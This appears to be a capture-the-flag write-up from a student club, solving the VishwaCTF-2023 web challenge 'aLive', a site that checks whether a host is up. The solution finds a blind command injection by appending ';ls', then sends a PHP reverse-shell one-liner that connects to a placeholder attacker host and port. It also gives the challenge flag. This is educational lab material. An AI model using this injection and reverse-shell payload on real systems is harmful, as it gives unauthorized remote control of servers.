WGCS | VishwaCTF-2023 Resources

Learn some CTF tips and tricks! Presented by the WGCS Club at KLSGIT

---

Project Created by KLSGIT-WGCS Maintained By — Darshan

Writeup - VishwaCTF

• Category web
• Name aLive
• Difficulty Medium

Description

In my college level project I created this website that tells us if any domain/ip is active or not. But there is a catch.

Solution

The proper method to solve this challenge was doing a Blind Command Injection.

This is how the website functions

Now lets try to play with it

FISHY!

Now this is a sign of a blind command injection, entering localhosts alone tells you that it is not active. But appending ;ls returns that it is active.

After inspecting the request I intercepted in burp suite I found this: X-Powered-By: PHP/8.1.2–1ubuntu2.11

Which tells two things. 1- The OS is Ubuntu. 2- The website’s backend is PHP. So I went to revshells.com and grabbed this reverse shell payload:

php -r '$sock=fsockopen("ATTACKER.IP",1337);shell_exec("sh <&3 >&3 2>&3");'

A nc listener is on as well as NGROK. The final payload I sent to the web application is this:

localhosts;php -r '$sock=fsockopen("ATTACKER.IP",1337);shell_exec("sh <&3 >&3 2>&3");

To print the flag, we can use the cat command or we can access to the directory (add /flag.txt to the URL).

VishwaCTF{b1inD_cmd-i}